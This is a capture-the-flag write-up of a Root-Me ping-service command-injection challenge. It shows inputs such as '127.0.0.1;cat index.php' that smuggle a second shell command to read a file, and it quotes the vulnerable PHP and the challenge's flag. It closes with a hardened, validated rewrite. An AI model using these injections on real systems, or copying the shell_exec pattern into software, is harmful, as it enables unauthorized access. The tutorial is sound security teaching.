Rootme Ping service v1
Command Injection
The challenge asks us to find a vulnerability in the service. The flag is located in the index.php file.
If we look at the challenge, we’re greeted by an input box that contains a local IP. If we input 127.0.0.1 and submit it, we get this:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.033/0.039/0.047/0.007 ms
So basically the service pings something.
We’ll just get the service to do an ls in its current location.
We’ll use the command 127.0.0.1;ls
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.026 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.026/0.029/0.033/0.003 ms
index.php
Now that we have the location of index.php, we’ll do a cat on it.
127.0.0.1;cat index.php
If we then look at the source code, we’ll see the flag.
<?php
$flag = "S3rv1ceP1n9Sup3rS3cure";
$ip = $_POST["ip"];
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
    $response = shell_exec("ping -c 3 ".$ip);
    echo $response;
}
?>
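The root cause is that $ip is concatenated into a string that shell_exec hands to a shell, so everything after the ; runs as a second command. A hardened variant of the handler follows, as an added example that is not the challenge's own code; the function names validated_ip and ping and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example (not the challenge's code): hardened ping handler.

// Return the input only if it is a literal IPv4 address, otherwise null.
// FILTER_VALIDATE_IP rejects any string containing shell metacharacters or a
// leading '-', so "127.0.0.1;ls" never reaches a command line.
function validated_ip($input): ?string
{
    if (!is_string($input)) {
        return null; // missing field or array-valued POST parameter
    }
    $ip = filter_var($input, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

// Run ping without a shell. The array form of proc_open (PHP >= 7.4) executes
// the binary directly, so ';', '|', '&&' and backticks are never interpreted.
function ping(string $ip): string
{
    $proc = proc_open(['ping', '-c', '3', $ip], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return "ping could not be started\n";
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return (string) $out;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    // Web request: validate first, then execute, then encode the output.
    $ip = validated_ip($_POST['ip'] ?? null);
    echo $ip === null
        ? 'Invalid IP address'
        : '<pre>' . htmlspecialchars(ping($ip)) . '</pre>';
} else {
    // Command-line run: show how the validator treats constructed sample inputs.
    foreach (['127.0.0.1', '127.0.0.1;ls', '127.0.0.1;cat index.php', '-c 1000'] as $sample) {
        echo str_pad($sample, 26), validated_ip($sample) === null ? "rejected\n" : "accepted\n";
    }
}
```

Run from the command line, only the first sample is accepted. Validation and shell-free execution are independent layers, so either one alone stops the payloads used above.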